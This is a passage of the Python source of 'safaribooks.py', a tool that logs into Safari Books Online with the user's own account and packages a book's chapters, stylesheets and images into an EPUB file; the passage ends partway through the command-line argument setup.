self.log(error)
output = self.SH_BG_RED + "[#]" + self.SH_DEFAULT + " %s" % error
self.out(output)
def exit(self, error):
self.error(str(error))
if self.output_dir_set:
output = (self.SH_YELLOW + "[+]" + self.SH_DEFAULT +
" Please delete the output directory '" + self.output_dir + "'"
" and restart the program.")
self.out(output)
output = self.SH_BG_RED + "[!]" + self.SH_DEFAULT + " Aborting..."
self.out(output)
self.save_last_request()
sys.exit(1)
def unhandled_exception(self, _, o, tb):
self.log("".join(traceback.format_tb(tb)))
self.exit("Unhandled Exception: %s (type: %s)" % (o, o.__class__.__name__))
def save_last_request(self):
if any(self.last_request):
self.log("Last request done:\n\tURL: {0}\n\tDATA: {1}\n\tOTHERS: {2}\n\n\t{3}\n{4}\n\n{5}\n"
.format(*self.last_request))
def intro(self):
output = self.SH_YELLOW + ("""
____ ___ _
/ __/__ _/ _/__ _____(_)
_\ \/ _ `/ _/ _ `/ __/ /
/___/\_,_/_/ \_,_/_/ /_/
/ _ )___ ___ / /__ ___
/ _ / _ \/ _ \/ '_/(_-<
/____/\___/\___/_/\_\/___/
""" if random() > 0.5 else """
██████╗ ██████╗ ██╗ ██╗ ██╗██████╗
██╔═══██╗ ██╔══██╗██║ ╚██╗ ██╔╝╚════██╗
██║ ██║ ██████╔╝██║ ╚████╔╝ ▄███╔╝
██║ ██║ ██╔══██╗██║ ╚██╔╝ ▀▀══╝
╚██████╔╝ ██║ ██║███████╗██║ ██╗
╚═════╝ ╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝
""") + self.SH_DEFAULT
output += "\n" + "~" * (self.columns // 2)
self.out(output)
def parse_description(self, desc):
if not desc:
return "n/d"
try:
return html.fromstring(desc).text_content()
except (html.etree.ParseError, html.etree.ParserError) as e:
self.log("Error parsing the description: %s" % e)
return "n/d"
def book_info(self, info):
description = self.parse_description(info.get("description", None)).replace("\n", " ")
for t in [
("Title", info.get("title", "")), ("Authors", ", ".join(aut.get("name", "") for aut in info.get("authors", []))),
("Identifier", info.get("identifier", "")), ("ISBN", info.get("isbn", "")),
("Publishers", ", ".join(pub.get("name", "") for pub in info.get("publishers", []))),
("Rights", info.get("rights", "")),
("Description", description[:500] + "..." if len(description) >= 500 else description),
("Release Date", info.get("issued", "")),
("URL", info.get("web_url", ""))
]:
self.info("{0}{1}{2}: {3}".format(self.SH_YELLOW, t[0], self.SH_DEFAULT, t[1]), True)
def state(self, origin, done):
progress = int(done * 100 / origin)
bar = int(progress * (self.columns - 11) / 100)
if self.state_status.value < progress:
self.state_status.value = progress
sys.stdout.write(
"\r " + self.SH_BG_YELLOW + "[" + ("#" * bar).ljust(self.columns - 11, "-") + "]" +
self.SH_DEFAULT + ("%4s" % progress) + "%" + ("\n" if progress == 100 else "")
)
def done(self, epub_file):
self.info("Done: %s\n\n" % epub_file +
" If you like it, please * this project on GitHub to make it known:\n"
" https://github.com/lorenzodifuccia/safaribooks\n"
" e don't forget to renew your Safari Books Online subscription:\n"
" " + SAFARI_BASE_URL + "\n\n" +
self.SH_BG_RED + "[!]" + self.SH_DEFAULT + " Bye!!")
@staticmethod
def api_error(response):
message = "API: "
if "detail" in response and "Not found" in response["detail"]:
message += "book's not present in Safari Books Online.\n" \
" The book identifier is the digits that you can find in the URL:\n" \
" `" + SAFARI_BASE_URL + "/library/view/book-name/XXXXXXXXXXXXX/`"
else:
os.remove(COOKIES_FILE)
message += "Out-of-Session%s.\n" % (" (%s)" % response["detail"]) if "detail" in response else "" + \
Display.SH_YELLOW + "[+]" + Display.SH_DEFAULT + \
" Use the `--cred` or `--login` options in order to perform the auth login to Safari."
return message
class WinQueue(list):  # TODO: multiprocessing `Process` fails on Windows: can't pickle _thread.RLock objects
def put(self, el):
self.append(el)
def qsize(self):
return self.__len__()
class SafariBooks:
LOGIN_URL = ORLY_BASE_URL + "/member/auth/login/"
LOGIN_ENTRY_URL = SAFARI_BASE_URL + "/login/unified/?next=/home/"
API_TEMPLATE = SAFARI_BASE_URL + "/api/v1/book/{0}/"
BASE_01_HTML = "<!DOCTYPE html>\n" \
"<html lang=\"en\" xml:lang=\"en\" xmlns=\"http://www.w3.org/1999/xhtml\"" \
" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\"" \
" xsi:schemaLocation=\"http://www.w3.org/2002/06/xhtml2/" \
" http://www.w3.org/MarkUp/SCHEMA/xhtml2.xsd\"" \
" xmlns:epub=\"http://www.idpf.org/2007/ops\">\n" \
"<head>\n" \
"{0}\n" \
"<style type=\"text/css\">" \
"body{{margin:1em;background-color:transparent!important;}}" \
"#sbo-rt-content *{{text-indent:0pt!important;}}#sbo-rt-content .bq{{margin-right:1em!important;}}"
KINDLE_HTML = "#sbo-rt-content *{{word-wrap:break-word!important;" \
"word-break:break-word!important;}}#sbo-rt-content table,#sbo-rt-content pre" \
"{{overflow-x:unset!important;overflow:unset!important;" \
"overflow-y:unset!important;white-space:pre-wrap!important;}}"
BASE_02_HTML = "</style>" \
"</head>\n" \
"<body>{1}</body>\n</html>"
CONTAINER_XML = "<?xml version=\"1.0\"?>" \
"<container version=\"1.0\" xmlns=\"urn:oasis:names:tc:opendocument:xmlns:container\">" \
"<rootfiles>" \
"<rootfile full-path=\"OEBPS/content.opf\" media-type=\"application/oebps-package+xml\" />" \
"</rootfiles>" \
"</container>"
# Format: ID, Title, Authors, Description, Subjects, Publisher, Rights, Date, CoverId, MANIFEST, SPINE, CoverUrl
CONTENT_OPF = "<?xml version=\"1.0\" encoding=\"utf-8\"?>\n" \
"<package xmlns=\"http://www.idpf.org/2007/opf\" unique-identifier=\"bookid\" version=\"2.0\" >\n" \
"<metadata xmlns:dc=\"http://purl.org/dc/elements/1.1/\" " \
" xmlns:opf=\"http://www.idpf.org/2007/opf\">\n" \
"<dc:title>{1}</dc:title>\n" \
"{2}\n" \
"<dc:description>{3}</dc:description>\n" \
"{4}" \
"<dc:publisher>{5}</dc:publisher>\n" \
"<dc:rights>{6}</dc:rights>\n" \
"<dc:language>en-US</dc:language>\n" \
"<dc:date>{7}</dc:date>\n" \
"<dc:identifier id=\"bookid\">{0}</dc:identifier>\n" \
"<meta name=\"cover\" content=\"{8}\"/>\n" \
"</metadata>\n" \
"<manifest>\n" \
"<item id=\"ncx\" href=\"toc.ncx\" media-type=\"application/x-dtbncx+xml\" />\n" \
"{9}\n" \
"</manifest>\n" \
"<spine toc=\"ncx\">\n{10}</spine>\n" \
"<guide><reference href=\"{11}\" title=\"Cover\" type=\"cover\" /></guide>\n" \
"</package>"
# Format: ID, Depth, Title, Author, NAVMAP
TOC_NCX = "<?xml version=\"1.0\" encoding=\"utf-8\" standalone=\"no\" ?>\n" \
"<!DOCTYPE ncx PUBLIC \"-//NISO//DTD ncx 2005-1//EN\"" \
" \"http://www.daisy.org/z3986/2005/ncx-2005-1.dtd\">\n" \
"<ncx xmlns=\"http://www.daisy.org/z3986/2005/ncx/\" version=\"2005-1\">\n" \
"<head>\n" \
"<meta content=\"ID:ISBN:{0}\" name=\"dtb:uid\"/>\n" \
"<meta content=\"{1}\" name=\"dtb:depth\"/>\n" \
"<meta content=\"0\" name=\"dtb:totalPageCount\"/>\n" \
"<meta content=\"0\" name=\"dtb:maxPageNumber\"/>\n" \
"</head>\n" \
"<docTitle><text>{2}</text></docTitle>\n" \
"<docAuthor><text>{3}</text></docAuthor>\n" \
"<navMap>{4}</navMap>\n" \
"</ncx>"
HEADERS = {
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8",
"Accept-Encoding": "gzip, deflate",
"Referer": LOGIN_ENTRY_URL,
"Upgrade-Insecure-Requests": "1",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) "
"Chrome/80.0.3987.163 Safari/537.36"
}
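    # Matches `max-age` cookie attributes carrying a float value (e.g. `max-age=31536000.0`),
    # which are presumably not accepted by the default cookie handling; see `handle_cookie_update`.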
COOKIE_FLOAT_MAX_AGE_PATTERN = re.compile(r'(max-age=\d*\.\d*)', re.IGNORECASE)
def __init__(self, args):
self.args = args
self.display = Display("info_%s.log" % escape(args.bookid))
self.display.intro()
self.session = requests.Session()
if USE_PROXY: # DEBUG
self.session.proxies = PROXIES
self.session.verify = False
self.session.headers.update(self.HEADERS)
self.jwt = {}
if not args.cred:
if not os.path.isfile(COOKIES_FILE):
self.display.exit("Login: unable to find `cookies.json` file.\n"
" Please use the `--cred` or `--login` options to perform the login.")
self.session.cookies.update(json.load(open(COOKIES_FILE)))
else:
self.display.info("Logging into Safari Books Online...", state=True)
self.do_login(*args.cred)
if not args.no_cookies:
json.dump(self.session.cookies.get_dict(), open(COOKIES_FILE, 'w'))
self.check_login()
self.book_id = args.bookid
self.api_url = self.API_TEMPLATE.format(self.book_id)
self.display.info("Retrieving book info...")
self.book_info = self.get_book_info()
self.display.book_info(self.book_info)
self.display.info("Retrieving book chapters...")
self.book_chapters = self.get_book_chapters()
self.chapters_queue = self.book_chapters[:]
if len(self.book_chapters) > sys.getrecursionlimit():
sys.setrecursionlimit(len(self.book_chapters))
self.book_title = self.book_info["title"]
self.base_url = self.book_info["web_url"]
self.clean_book_title = "".join(self.escape_dirname(self.book_title).split(",")[:2]) \
+ " ({0})".format(self.book_id)
books_dir = os.path.join(PATH, "Books")
if not os.path.isdir(books_dir):
os.mkdir(books_dir)
self.BOOK_PATH = os.path.join(books_dir, self.clean_book_title)
self.display.set_output_dir(self.BOOK_PATH)
self.css_path = ""
self.images_path = ""
self.create_dirs()
self.chapter_title = ""
self.filename = ""
self.chapter_stylesheets = []
self.css = []
self.images = []
self.display.info("Downloading book contents... (%s chapters)" % len(self.book_chapters), state=True)
self.BASE_HTML = self.BASE_01_HTML + (self.KINDLE_HTML if not args.kindle else "") + self.BASE_02_HTML
self.cover = False
self.get()
if not self.cover:
self.cover = self.get_default_cover()
cover_html = self.parse_html(
html.fromstring("<div id=\"sbo-rt-content\"><img src=\"Images/{0}\"></div>".format(self.cover)), True
)
self.book_chapters = [{
"filename": "default_cover.xhtml",
"title": "Cover"
}] + self.book_chapters
self.filename = self.book_chapters[0]["filename"]
self.save_page_html(cover_html)
self.css_done_queue = Queue(0) if "win" not in sys.platform else WinQueue()
self.display.info("Downloading book CSSs... (%s files)" % len(self.css), state=True)
self.collect_css()
self.images_done_queue = Queue(0) if "win" not in sys.platform else WinQueue()
self.display.info("Downloading book images... (%s files)" % len(self.images), state=True)
self.collect_images()
self.display.info("Creating EPUB file...", state=True)
self.create_epub()
if not args.no_cookies:
json.dump(self.session.cookies.get_dict(), open(COOKIES_FILE, "w"))
self.display.done(os.path.join(self.BOOK_PATH, self.book_id + ".epub"))
self.display.unregister()
if not self.display.in_error and not args.log:
os.remove(self.display.log_file)
def handle_cookie_update(self, set_cookie_headers):
for morsel in set_cookie_headers:
# Handle Float 'max-age' Cookie
if self.COOKIE_FLOAT_MAX_AGE_PATTERN.search(morsel):
cookie_key, cookie_value = morsel.split(";")[0].split("=")
self.session.cookies.set(cookie_key, cookie_value)
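    # Thin wrapper around `requests`: redirects are disabled so that every `Set-Cookie` header can be
    # inspected (see `handle_cookie_update`), the last request is recorded for debugging, and redirects
    # are then followed manually. Returns 0 on connection errors.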
def requests_provider(self, url, is_post=False, data=None, perform_redirect=True, **kwargs):
try:
response = getattr(self.session, "post" if is_post else "get")(
url,
data=data,
allow_redirects=False,
**kwargs
)
self.handle_cookie_update(response.raw.headers.getlist("Set-Cookie"))
self.display.last_request = (
url, data, kwargs, response.status_code, "\n".join(
["\t{}: {}".format(*h) for h in response.headers.items()]
), response.text
)
except (requests.ConnectionError, requests.ConnectTimeout, requests.RequestException) as request_exception:
self.display.error(str(request_exception))
return 0
if response.is_redirect and perform_redirect:
return self.requests_provider(response.next.url, is_post, None, perform_redirect)
# TODO How about **kwargs?
return response
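    # Split an `email:password` credential string into a two-element list;
    # returns False if it does not look like `someone@host:secret`.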
@staticmethod
def parse_cred(cred):
if ":" not in cred:
return False
sep = cred.index(":")
new_cred = ["", ""]
new_cred[0] = cred[:sep].strip("'").strip('"')
if "@" not in new_cred[0]:
return False
new_cred[1] = cred[sep + 1:]
return new_cred
def do_login(self, email, password):
response = self.requests_provider(self.LOGIN_ENTRY_URL)
if response == 0:
self.display.exit("Login: unable to reach Safari Books Online. Try again...")
next_parameter = None
try:
next_parameter = parse_qs(urlparse(response.request.url).query)["next"][0]
except (AttributeError, ValueError, IndexError):
self.display.exit("Login: unable to complete login on Safari Books Online. Try again...")
redirect_uri = API_ORIGIN_URL + quote_plus(next_parameter)
response = self.requests_provider(
self.LOGIN_URL,
is_post=True,
json={
"email": email,
"password": password,
"redirect_uri": redirect_uri
},
perform_redirect=False
)
if response == 0:
self.display.exit("Login: unable to perform auth to Safari Books Online.\n Try again...")
if response.status_code != 200: # TODO To be reviewed
try:
error_page = html.fromstring(response.text)
errors_message = error_page.xpath("//ul[@class='errorlist']//li/text()")
recaptcha = error_page.xpath("//div[@class='g-recaptcha']")
messages = ([" `%s`" % error for error in errors_message
if "password" in error or "email" in error] if len(errors_message) else []) + \
([" `ReCaptcha required (wait or do logout from the website).`"] if len(
recaptcha) else [])
self.display.exit(
"Login: unable to perform auth login to Safari Books Online.\n" + self.display.SH_YELLOW +
"[*]" + self.display.SH_DEFAULT + " Details:\n" + "%s" % "\n".join(
messages if len(messages) else [" Unexpected error!"])
)
except (html.etree.ParseError, html.etree.ParserError) as parsing_error:
self.display.error(parsing_error)
self.display.exit(
"Login: your login went wrong and it encountered in an error"
" trying to parse the login details of Safari Books Online. Try again..."
)
self.jwt = response.json() # TODO: save JWT Tokens and use the refresh_token to restore user session
response = self.requests_provider(self.jwt["redirect_uri"])
if response == 0:
self.display.exit("Login: unable to reach Safari Books Online. Try again...")
def check_login(self):
response = self.requests_provider(PROFILE_URL, perform_redirect=False)
if response == 0:
self.display.exit("Login: unable to reach Safari Books Online. Try again...")
elif response.status_code != 200:
self.display.exit("Authentication issue: unable to access profile page.")
elif "user_type\":\"Expired" in response.text:
self.display.exit("Authentication issue: account subscription expired.")
self.display.info("Successfully authenticated.", state=True)
def get_book_info(self):
response = self.requests_provider(self.api_url)
if response == 0:
self.display.exit("API: unable to retrieve book info.")
response = response.json()
if not isinstance(response, dict) or len(response.keys()) == 1:
self.display.exit(self.display.api_error(response))
if "last_chapter_read" in response:
del response["last_chapter_read"]
for key, value in response.items():
if value is None:
response[key] = 'n/a'
return response
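    # The chapter list is paginated: pages are fetched recursively, and chapters whose filename or
    # title contains "cover" are moved to the front so the cover page is processed first.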
def get_book_chapters(self, page=1):
response = self.requests_provider(urljoin(self.api_url, "chapter/?page=%s" % page))
if response == 0:
self.display.exit("API: unable to retrieve book chapters.")
response = response.json()
if not isinstance(response, dict) or len(response.keys()) == 1:
self.display.exit(self.display.api_error(response))
if "results" not in response or not len(response["results"]):
self.display.exit("API: unable to retrieve book chapters.")
if response["count"] > sys.getrecursionlimit():
sys.setrecursionlimit(response["count"])
result = []
result.extend([c for c in response["results"] if "cover" in c["filename"] or "cover" in c["title"]])
for c in result:
del response["results"][response["results"].index(c)]
result += response["results"]
return result + (self.get_book_chapters(page + 1) if response["next"] else [])
def get_default_cover(self):
response = self.requests_provider(self.book_info["cover"], stream=True)
if response == 0:
self.display.error("Error trying to retrieve the cover: %s" % self.book_info["cover"])
return False
file_ext = response.headers["Content-Type"].split("/")[-1]
with open(os.path.join(self.images_path, "default_cover." + file_ext), 'wb') as i:
for chunk in response.iter_content(1024):
i.write(chunk)
return "default_cover." + file_ext
def get_html(self, url):
response = self.requests_provider(url)
if response == 0 or response.status_code != 200:
self.display.exit(
"Crawler: error trying to retrieve this page: %s (%s)\n From: %s" %
(self.filename, self.chapter_title, url)
)
root = None
try:
root = html.fromstring(response.text, base_url=SAFARI_BASE_URL)
except (html.etree.ParseError, html.etree.ParserError) as parsing_error:
self.display.error(parsing_error)
self.display.exit(
"Crawler: error trying to parse this page: %s (%s)\n From: %s" %
(self.filename, self.chapter_title, url)
)
return root
@staticmethod
def url_is_absolute(url):
return bool(urlparse(url).netloc)
@staticmethod
def is_image_link(url: str):
return pathlib.Path(url).suffix[1:].lower() in ["jpg", "jpeg", "png", "gif"]
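    # Rewrite in-book links: relative links to images/graphics are redirected to the local `Images/`
    # folder, other relative links get the `.xhtml` extension, and absolute links that point into the
    # same book are made relative again.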
def link_replace(self, link):
if link and not link.startswith("mailto"):
if not self.url_is_absolute(link):
if any(x in link for x in ["cover", "images", "graphics"]) or \
self.is_image_link(link):
image = link.split("/")[-1]
return "Images/" + image
return link.replace(".html", ".xhtml")
else:
if self.book_id in link:
return self.link_replace(link.split(self.book_id)[-1])
return link
@staticmethod
def get_cover(html_root):
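        # Register a `lower-case()` XPath helper, then look for an <img> tagged as the cover by its
        # id/class/name/src/alt, falling back to cover-tagged <div>s and <a>s containing an <img>.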
lowercase_ns = etree.FunctionNamespace(None)
lowercase_ns["lower-case"] = lambda _, n: n[0].lower() if n and len(n) else ""
images = html_root.xpath("//img[contains(lower-case(@id), 'cover') or contains(lower-case(@class), 'cover') or"
"contains(lower-case(@name), 'cover') or contains(lower-case(@src), 'cover') or"
"contains(lower-case(@alt), 'cover')]")
if len(images):
return images[0]
divs = html_root.xpath("//div[contains(lower-case(@id), 'cover') or contains(lower-case(@class), 'cover') or"
"contains(lower-case(@name), 'cover') or contains(lower-case(@src), 'cover')]//img")
if len(divs):
return divs[0]
a = html_root.xpath("//a[contains(lower-case(@id), 'cover') or contains(lower-case(@class), 'cover') or"
"contains(lower-case(@name), 'cover') or contains(lower-case(@src), 'cover')]//img")
if len(a):
return a[0]
return None
def parse_html(self, root, first_page=False):
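        # Spot-check (on roughly 20% of pages) for the 'controls' element that appears to indicate an
        # expired session, and abort with an API error if it is found.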
if random() > 0.8:
if len(root.xpath("//div[@class='controls']/a/text()")):
self.display.exit(self.display.api_error(" "))
book_content = root.xpath("//div[@id='sbo-rt-content']")
if not len(book_content):
self.display.exit(
"Parser: book content's corrupted or not present: %s (%s)" %
(self.filename, self.chapter_title)
)
page_css = ""
if len(self.chapter_stylesheets):
for chapter_css_url in self.chapter_stylesheets:
if chapter_css_url not in self.css:
self.css.append(chapter_css_url)
self.display.log("Crawler: found a new CSS at %s" % chapter_css_url)
page_css += "<link href=\"Styles/Style{0:0>2}.css\" " \
"rel=\"stylesheet\" type=\"text/css\" />\n".format(self.css.index(chapter_css_url))
stylesheet_links = root.xpath("//link[@rel='stylesheet']")
if len(stylesheet_links):
for s in stylesheet_links:
css_url = urljoin("https:", s.attrib["href"]) if s.attrib["href"][:2] == "//" \
else urljoin(self.base_url, s.attrib["href"])
if css_url not in self.css:
self.css.append(css_url)
self.display.log("Crawler: found a new CSS at %s" % css_url)
page_css += "<link href=\"Styles/Style{0:0>2}.css\" " \
"rel=\"stylesheet\" type=\"text/css\" />\n".format(self.css.index(css_url))
stylesheets = root.xpath("//style")
if len(stylesheets):
for css in stylesheets:
if "data-template" in css.attrib and len(css.attrib["data-template"]):
css.text = css.attrib["data-template"]
del css.attrib["data-template"]
try:
page_css += html.tostring(css, method="xml", encoding='unicode') + "\n"
except (html.etree.ParseError, html.etree.ParserError) as parsing_error:
self.display.error(parsing_error)
self.display.exit(
"Parser: error trying to parse one CSS found in this page: %s (%s)" %
(self.filename, self.chapter_title)
)
# TODO: add all not covered tag for `link_replace` function
svg_image_tags = root.xpath("//image")
if len(svg_image_tags):
for img in svg_image_tags:
image_attr_href = [x for x in img.attrib.keys() if "href" in x]
if len(image_attr_href):
svg_url = img.attrib.get(image_attr_href[0])
svg_root = img.getparent().getparent()
new_img = svg_root.makeelement("img")
new_img.attrib.update({"src": svg_url})
svg_root.remove(img.getparent())
svg_root.append(new_img)
book_content = book_content[0]
book_content.rewrite_links(self.link_replace)
xhtml = None
try:
if first_page:
is_cover = self.get_cover(book_content)
if is_cover is not None:
page_css = "<style>" \
"body{display:table;position:absolute;margin:0!important;height:100%;width:100%;}" \
"#Cover{display:table-cell;vertical-align:middle;text-align:center;}" \
"img{height:90vh;margin-left:auto;margin-right:auto;}" \
"</style>"
cover_html = html.fromstring("<div id=\"Cover\"></div>")
cover_div = cover_html.xpath("//div")[0]
cover_img = cover_div.makeelement("img")
cover_img.attrib.update({"src": is_cover.attrib["src"]})
cover_div.append(cover_img)
book_content = cover_html
self.cover = is_cover.attrib["src"]
xhtml = html.tostring(book_content, method="xml", encoding='unicode')
except (html.etree.ParseError, html.etree.ParserError) as parsing_error:
self.display.error(parsing_error)
self.display.exit(
"Parser: error trying to parse HTML of this page: %s (%s)" %
(self.filename, self.chapter_title)
)
return page_css, xhtml
@staticmethod
def escape_dirname(dirname, clean_space=False):
if ":" in dirname:
if dirname.index(":") > 15:
dirname = dirname.split(":")[0]
elif "win" in sys.platform:
dirname = dirname.replace(":", ",")
for ch in ['~', '#', '%', '&', '*', '{', '}', '\\', '<', '>', '?', '/', '`', '\'', '"', '|', '+', ':']:
if ch in dirname:
dirname = dirname.replace(ch, "_")
return dirname if not clean_space else dirname.replace(" ", "")
def create_dirs(self):
if os.path.isdir(self.BOOK_PATH):
self.display.log("Book directory already exists: %s" % self.BOOK_PATH)
else:
os.makedirs(self.BOOK_PATH)
oebps = os.path.join(self.BOOK_PATH, "OEBPS")
if not os.path.isdir(oebps):
self.display.book_ad_info = True
os.makedirs(oebps)
self.css_path = os.path.join(oebps, "Styles")
if os.path.isdir(self.css_path):
self.display.log("CSSs directory already exists: %s" % self.css_path)
else:
os.makedirs(self.css_path)
self.display.css_ad_info.value = 1
self.images_path = os.path.join(oebps, "Images")
if os.path.isdir(self.images_path):
self.display.log("Images directory already exists: %s" % self.images_path)
else:
os.makedirs(self.images_path)
self.display.images_ad_info.value = 1
def save_page_html(self, contents):
self.filename = self.filename.replace(".html", ".xhtml")
open(os.path.join(self.BOOK_PATH, "OEBPS", self.filename), "wb") \
.write(self.BASE_HTML.format(contents[0], contents[1]).encode("utf-8", 'xmlcharrefreplace'))
self.display.log("Created: %s" % self.filename)
def get(self):
len_books = len(self.book_chapters)
for _ in range(len_books):
if not len(self.chapters_queue):
return
first_page = len_books == len(self.chapters_queue)
next_chapter = self.chapters_queue.pop(0)
self.chapter_title = next_chapter["title"]
self.filename = next_chapter["filename"]
# Images
if "images" in next_chapter and len(next_chapter["images"]):
self.images.extend(urljoin(next_chapter['asset_base_url'], img_url)
for img_url in next_chapter['images'])
# Stylesheets
self.chapter_stylesheets = []
if "stylesheets" in next_chapter and len(next_chapter["stylesheets"]):
self.chapter_stylesheets.extend(x["url"] for x in next_chapter["stylesheets"])
if "site_styles" in next_chapter and len(next_chapter["site_styles"]):
self.chapter_stylesheets.extend(next_chapter["site_styles"])
if os.path.isfile(os.path.join(self.BOOK_PATH, "OEBPS", self.filename.replace(".html", ".xhtml"))):
if not self.display.book_ad_info and \
next_chapter not in self.book_chapters[:self.book_chapters.index(next_chapter)]:
self.display.info(
("File `%s` already exists.\n"
" If you want to download again all the book,\n"
" please delete the output directory '" + self.BOOK_PATH + "' and restart the program.")
% self.filename.replace(".html", ".xhtml")
)
self.display.book_ad_info = 2
else:
self.save_page_html(self.parse_html(self.get_html(next_chapter["content"]), first_page))
self.display.state(len_books, len_books - len(self.chapters_queue))
def _thread_download_css(self, url):
css_file = os.path.join(self.css_path, "Style{0:0>2}.css".format(self.css.index(url)))
if os.path.isfile(css_file):
if not self.display.css_ad_info.value and url not in self.css[:self.css.index(url)]:
self.display.info(("File `%s` already exists.\n"
" If you want to download again all the CSSs,\n"
" please delete the output directory '" + self.BOOK_PATH + "'"
" and restart the program.") %
css_file)
self.display.css_ad_info.value = 1
else:
response = self.requests_provider(url)
if response == 0:
self.display.error("Error trying to retrieve this CSS: %s\n From: %s" % (css_file, url))
with open(css_file, 'wb') as s:
s.write(response.content)
self.css_done_queue.put(1)
self.display.state(len(self.css), self.css_done_queue.qsize())
def _thread_download_images(self, url):
image_name = url.split("/")[-1]
image_path = os.path.join(self.images_path, image_name)
if os.path.isfile(image_path):
if not self.display.images_ad_info.value and url not in self.images[:self.images.index(url)]:
self.display.info(("File `%s` already exists.\n"
" If you want to download again all the images,\n"
" please delete the output directory '" + self.BOOK_PATH + "'"
" and restart the program.") %
image_name)
self.display.images_ad_info.value = 1
else:
response = self.requests_provider(urljoin(SAFARI_BASE_URL, url), stream=True)
if response == 0:
self.display.error("Error trying to retrieve this image: %s\n From: %s" % (image_name, url))
return
with open(image_path, 'wb') as img:
for chunk in response.iter_content(1024):
img.write(chunk)
self.images_done_queue.put(1)
self.display.state(len(self.images), self.images_done_queue.qsize())
def _start_multiprocessing(self, operation, full_queue):
if len(full_queue) > 5:
for i in range(0, len(full_queue), 5):
self._start_multiprocessing(operation, full_queue[i:i + 5])
else:
process_queue = [Process(target=operation, args=(arg,)) for arg in full_queue]
for proc in process_queue:
proc.start()
for proc in process_queue:
proc.join()
def collect_css(self):
self.display.state_status.value = -1
# "self._start_multiprocessing" seems to cause problem. Switching to mono-thread download.
for css_url in self.css:
self._thread_download_css(css_url)
def collect_images(self):
if self.display.book_ad_info == 2:
self.display.info("Some of the book contents were already downloaded.\n"
" If you want to be sure that all the images will be downloaded,\n"
" please delete the output direcotry '" + self.BOOK_PATH +
"' and restart the program.")
self.display.state_status.value = -1
# "self._start_multiprocessing" seems to cause problem. Switching to mono-thread download.
for image_url in self.images:
self._thread_download_images(image_url)
def create_content_opf(self):
self.css = next(os.walk(self.css_path))[2]
self.images = next(os.walk(self.images_path))[2]
manifest = []
spine = []
for c in self.book_chapters:
c["filename"] = c["filename"].replace(".html", ".xhtml")
item_id = escape("".join(c["filename"].split(".")[:-1]))
manifest.append("<item id=\"{0}\" href=\"{1}\" media-type=\"application/xhtml+xml\" />".format(
item_id, c["filename"]
))
spine.append("<itemref idref=\"{0}\"/>".format(item_id))
for i in set(self.images):
dot_split = i.split(".")
head = "img_" + escape("".join(dot_split[:-1]))
extension = dot_split[-1]
manifest.append("<item id=\"{0}\" href=\"Images/{1}\" media-type=\"image/{2}\" />".format(
head, i, "jpeg" if "jp" in extension else extension
))
for i in range(len(self.css)):
manifest.append("<item id=\"style_{0:0>2}\" href=\"Styles/Style{0:0>2}.css\" "
"media-type=\"text/css\" />".format(i))
authors = "\n".join("<dc:creator opf:file-as=\"{0}\" opf:role=\"aut\">{0}</dc:creator>".format(
escape(aut.get("name", "n/d"))
) for aut in self.book_info.get("authors", []))
subjects = "\n".join("<dc:subject>{0}</dc:subject>".format(escape(sub.get("name", "n/d")))
for sub in self.book_info.get("subjects", []))
return self.CONTENT_OPF.format(
(self.book_info.get("isbn", self.book_id)),
escape(self.book_title),
authors,
escape(self.book_info.get("description", "")),
subjects,
", ".join(escape(pub.get("name", "")) for pub in self.book_info.get("publishers", [])),
escape(self.book_info.get("rights", "")),
self.book_info.get("issued", ""),
self.cover,
"\n".join(manifest),
"\n".join(spine),
self.book_chapters[0]["filename"].replace(".html", ".xhtml")
)
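    # Recursively turn the TOC returned by the API into nested <navPoint> elements;
    # `c` is the running playOrder counter and `mx` the maximum depth seen so far.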
@staticmethod
def parse_toc(l, c=0, mx=0):
r = ""
for cc in l:
c += 1
if int(cc["depth"]) > mx:
mx = int(cc["depth"])
r += "<navPoint id=\"{0}\" playOrder=\"{1}\">" \
"<navLabel><text>{2}</text></navLabel>" \
"<content src=\"{3}\"/>".format(
cc["fragment"] if len(cc["fragment"]) else cc["id"], c,
escape(cc["label"]), cc["href"].replace(".html", ".xhtml").split("/")[-1]
)
if cc["children"]:
sr, c, mx = SafariBooks.parse_toc(cc["children"], c, mx)
r += sr
r += "</navPoint>\n"
return r, c, mx
def create_toc(self):
response = self.requests_provider(urljoin(self.api_url, "toc/"))
if response == 0:
self.display.exit("API: unable to retrieve book chapters. "
"Don't delete any files, just run again this program"
" in order to complete the `.epub` creation!")
response = response.json()
if not isinstance(response, list) and len(response.keys()) == 1:
self.display.exit(
self.display.api_error(response) +
" Don't delete any files, just run again this program"
" in order to complete the `.epub` creation!"
)
navmap, _, max_depth = self.parse_toc(response)
return self.TOC_NCX.format(
(self.book_info["isbn"] if self.book_info["isbn"] else self.book_id),
max_depth,
self.book_title,
", ".join(aut["name"] for aut in self.book_info["authors"]),
navmap
)
def create_epub(self):
open(os.path.join(self.BOOK_PATH, "mimetype"), "w").write("application/epub+zip")
meta_info = os.path.join(self.BOOK_PATH, "META-INF")
if os.path.isdir(meta_info):
self.display.log("META-INF directory already exists: %s" % meta_info)
else:
os.makedirs(meta_info)
open(os.path.join(meta_info, "container.xml"), "wb").write(
self.CONTAINER_XML.encode("utf-8", "xmlcharrefreplace")
)
open(os.path.join(self.BOOK_PATH, "OEBPS", "content.opf"), "wb").write(
self.create_content_opf().encode("utf-8", "xmlcharrefreplace")
)
open(os.path.join(self.BOOK_PATH, "OEBPS", "toc.ncx"), "wb").write(
self.create_toc().encode("utf-8", "xmlcharrefreplace")
)
zip_file = os.path.join(PATH, "Books", self.book_id)
if os.path.isfile(zip_file + ".zip"):
os.remove(zip_file + ".zip")
shutil.make_archive(zip_file, 'zip', self.BOOK_PATH)
os.rename(zip_file + ".zip", os.path.join(self.BOOK_PATH, self.book_id) + ".epub")
# MAIN
if __name__ == "__main__":
arguments = argparse.ArgumentParser(prog="safaribooks.py",
description="Download and generate an EPUB of your favorite books"
" from Safari Books Online.",
add_help=False,
allow_abbrev=False)
login_arg_group = arguments.add_mutually_exclusive_group()
login_arg_group.add_argument(
"--cred", metavar="<EMAIL:PASS>", default=False,
help="Credentials used to perform the auth login on Safari Books Online."
" Es. ` --cred \"account_mail@mail.com:password01\" `."
)
login_arg_group.add_argument(
"--login", action='store_true',
help="Prompt for credentials used to perform the auth login on Safari Books Online."
)
arguments.add_argument(
